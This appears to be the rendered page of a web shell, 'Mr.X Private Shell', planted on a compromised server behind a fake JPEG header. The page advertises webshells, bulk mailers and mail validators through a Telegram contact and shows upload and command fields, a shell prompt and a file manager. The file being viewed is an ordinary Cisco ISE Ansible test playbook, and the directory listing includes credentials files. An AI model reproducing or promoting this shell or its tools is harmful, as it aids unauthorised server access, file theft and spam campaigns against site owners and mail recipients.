����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
---
- hosts: ise_servers
  gather_facts: false
  vars:
    itemTest:
      name: "Cisco_Ansible_Test_09_12"
      accessType: "ACCESS_ACCEPT"
      description: "Test"
      authzProfileType: "SWITCH"
      vlan:
        nameID: "172_28_1_0-VN_IOT"
        tagID: 1
      trackMovement: false
      agentlessPosture: false
      serviceTemplate: false
      profileName: "Cisco"
  tasks:
  ## https://github.com/CiscoISE/ansible-ise/issues/72
  ## post 400
  # - name: Get all Network Access Authorization Rules
  #   cisco.ise.network_access_authorization_rules:
  #     state: present
  #     policyId: acd4b55d-dca3-4b93-a160-8a2d01669827
  #     rule:
  #       default: false
  #       #id: d9e67664-799d-4ad9-a407-8365117c18e5
  #       name: Ansible B TEST
  #       hitCounts: 0
  #       rank: 0
  #       state: enabled
  #       condition:
  #         conditionType: ConditionAndBlock
  #         isNegate: false
  #         children:
  #           - conditionType: ConditionReference
  #             isNegate: false
  #             name: Wireless_Access
  #             id: ff6008e0-5c35-48a3-9fab-e0e709983369
  #             # description: >-
  #             #   Default condition used to match any authentication request from Cisco
  #             #   Wireless LAN Controller.
  #           - conditionType: ConditionAttributes
  #             isNegate: false
  #             dictionaryName: IdentityGroup
  #             attributeName: Name
  #             operator: equals
  #             #dictionaryValue: null
  #             attributeValue: 'Endpoint Identity Groups:Blocked List'
  #     profile:
  #       - Blackhole_Wireless_Access
  #     #securityGroup: null
  #   register: result

  # - name: Get all Network Access Authorization Rules
  #   cisco.ise.network_access_authorization_rules_info:
  #     policyId: acd4b55d-dca3-4b93-a160-8a2d01669827
  #   register: result

  ## https://github.com/CiscoISE/ansible-ise/issues/74

  # - name: Create or update Authorization profile
  #   cisco.ise.authorization_profile:
  #     name: "{{  itemTest.name  }}"
  #     accessType: "{{  itemTest.accessType  }}"
  #     description:  "{{ itemTest.description  }}"
  #     authzProfileType:  "{{  itemTest.authzProfileType  }}"
  #     vlan:
  #       nameID: "{{  itemTest.vlan.nameID  }}"
  #       tagID:
  #         "{{itemTest.vlan.tagID|int}}"
  #     trackMovement:  "{{ itemTest.trackMovement  }}"
  #     agentlessPosture:  "{{ itemTest.agentlessPosture  }}"
  #     serviceTemplate:  "{{  itemTest.serviceTemplate  }}"
  #     profileName:  "{{  itemTest.profileName  }}"
  #   register: result
  
  # - name: Get all Authorization Profile
  #   cisco.ise.authorization_profile_info:
  #     name: Cisco_Temporal_Onboard
  #   register: result

  # - name: debug
  #   debug:
  #      msg: "{{ itemTest.vlan.tagID | int == 0 }}"

  # - name: debug
  #   debug:
  #      msg: |
  #        {{ item.vlanID | int }}
  #   loop:
  #     - { "vlanID": "1" }
  #     - { "vlanID": "2" }
  #     - { "vlanID": 2 }

  # - name: debug
  #   debug:
  #      var: |-
  #         {{ item.vlanID | int }}
  #   loop:
  #     - { "vlanID": 1 }
  #     - { "vlanID": "2" }

  ## https://github.com/CiscoISE/ansible-ise/issues/76
  ## Node group creation is not idempotent
  ## fatal: [localhost]: FAILED! => {"changed": false, "msg": "An error occured when executing operation. The error was: [409] - The request could not be processed because it conflicts with some established rule of the system.\n{\n  \"error\" : {\n    \"message\" : \"NodeGroup 'TestGroup1' already exist.\"\n  },\n  \"version\" : \"1.0.0\"\n}"}
  # - name: Create test node group.
  #   cisco.ise.node_group:
  #     state: present
  #     description: "Testing creation and idempotency"
  #     name: "TesAnsible76"
  #     nodeGroupName: "TesAnsible76"
  #     forceDelete: true
  #   register: result

  # - name: Get all Node Group
  #   cisco.ise.node_group_info:
  #     nodeGroupName: "NodeGroup2"
  #   register: result

  ##https://github.com/CiscoISE/ansible-ise/issues/79
  ## Cannot update
  # - name: Create or update an network_access_authentication_rules
  #   cisco.ise.network_access_authentication_rules:
  #     state: present
  #     rule:
  #       default: false
  #       name: TestAnsibleIssue79
  #       hitCounts: 00
  #       rank: 0
  #       state: enabled
  #       #id: b086e85e-6118-4b67-8efc-05d692423afb
  #       condition:
  #         conditionType: ConditionReference
  #         isNegate: false
  #         dictionaryName: Network Access
  #         attributeName: EapAuthentication
  #         operator: equals
  #         attributeValue: EAP-MSCHAPv2
  #         name: EAP-MSCHAPv2
  #         id: c456a490-0429-4fd4-91d7-efd1eb1f855a
  #     ifAuthFail: REJECT
  #     ifUserNotFound: REJECT
  #     ifProcessFail: DROP
  #     policyId: acd4b55d-dca3-4b93-a160-8a2d01669827
  #   register: result

  
  ##https://github.com/CiscoISE/ansible-ise/issues/77
  ## Get error
  ## node_group_node_info
  # - name: Get all Node Group Node
  #   cisco.ise.node_group_node_info:
  #     nodeGroupName: TesAnsible76
  #   register: result

  ##https://github.com/CiscoISE/ansible-ise/issues/81
  ## Unable to update Authorization Policies
  ##network_access_authorization_rules
  - name: CRUD
    cisco.ise.network_access_authorization_rules:
      state: present
      #state: absent
      rule:
        default: false
        name: TestAnsibleIssue81
        rank: 0
        state: enabled
        condition:
          conditionType: ConditionAttributes
          isNegate: false
          dictionaryName: IdentityGroup
          attributeName: Name
          operator: equals
          attributeValue: 'Endpoint Identity Groups:IAC_Lab1'
      profile:
        - Blackhole_Wireless_Access
      #securityGroup: BYOD
      policyId: acd4b55d-dca3-4b93-a160-8a2d01669827
    register: result

  - name: Print Authorization profile
    ansible.builtin.debug:
      var: result

Filemanager

Name Type Size Permission Actions
group_vars Folder 0755
vars Folder 0755
aci_settings.yml File 1.47 KB 0644
active_directory.yml File 2.63 KB 0644
allowed_protocols.yml File 1.95 KB 0644
anc_policy.yml File 800 B 0644
authorization_profile.yml File 1.37 KB 0644
aws_deployment.yml File 605 B 0644
azure_deployment.yml File 1.87 KB 0644
b.yml File 3.51 KB 0644
backup_create.yml File 1.34 KB 0644
backup_restore.yml File 509 B 0644
backup_schedule.yml File 623 B 0644
byod_portal.yml File 15.4 KB 0644
certificate_management.yml File 2.48 KB 0644
certificate_profile.yml File 781 B 0644
certificates.yml File 1.4 KB 0644
credentials.template File 391 B 0644
credentials.yml File 605 B 0644
csr_export.yml File 1.94 KB 0644
deployment_info.yml File 416 B 0644
device_administration_authentication_rules.yml File 1.99 KB 0644
device_administration_authorization_exception_rules.yml File 1.9 KB 0644
device_administration_authorization_global_exception_rules.yml File 1.71 KB 0644
device_administration_authorization_rules.yml File 1.75 KB 0644
device_administration_network_conditions.yml File 1.56 KB 0644
device_administration_policy_set.yml File 2 KB 0644
device_administration_time_date_conditions.yml File 1.98 KB 0644
downloadable_acl.yml File 1.17 KB 0644
egress_matrix_cell.yml File 2.2 KB 0644
endpoint.yml File 1.36 KB 0644
endpoint_certificate.yml File 590 B 0644
endpoint_group.yml File 505 B 0644
filter_policy.yml File 1.73 KB 0644
hosts File 141 B 0644
identity_group.yml File 916 B 0644
internal_user.yml File 3.3 KB 0644
my_device_portal.yml File 567 B 0644
native_supplicant_profile.yml File 763 B 0644
network_access_authentication_rules.yml File 1.73 KB 0644
network_access_authorization_exception_rules.yml File 1.83 KB 0644
network_access_authorization_global_exception_rules.yml File 1.7 KB 0644
network_access_authorization_rules.yml File 1.71 KB 0644
network_access_conditions.yml File 2.5 KB 0644
network_access_dictionary.yml File 1.25 KB 0644
network_access_dictionary_attribute.yml File 1.29 KB 0644
network_access_network_condition.yml File 1.48 KB 0644
network_access_policy_set.yml File 1.87 KB 0644
network_access_time_date_conditions.yml File 1.68 KB 0644
network_device.yml File 2.27 KB 0644
network_device_group.yml File 2.09 KB 0644
network_device_group_deparments.yml File 5.53 KB 0644
personas_deployment.yml File 471 B 0644
playbookstest.yml File 5.86 KB 0644
portal_global_setting.yml File 1020 B 0644
portal_theme.yml File 882 B 0644
profiler-services.yml File 700 B 0644
radius_server_sequence.yml File 1.56 KB 0644
sponsor_portal.yml File 58.7 KB 0644
support_bundle.yml File 1.97 KB 0644
system_certificate.yml File 1.99 KB 0644
trustsec_nbarapp.yml File 3.84 KB 0644
trustsec_sg_vn_mapping.yml File 2.21 KB 0644
trustsec_vn.yml File 2.29 KB 0644
trustsec_vn_vlan_mapping.yml File 2.22 KB 0644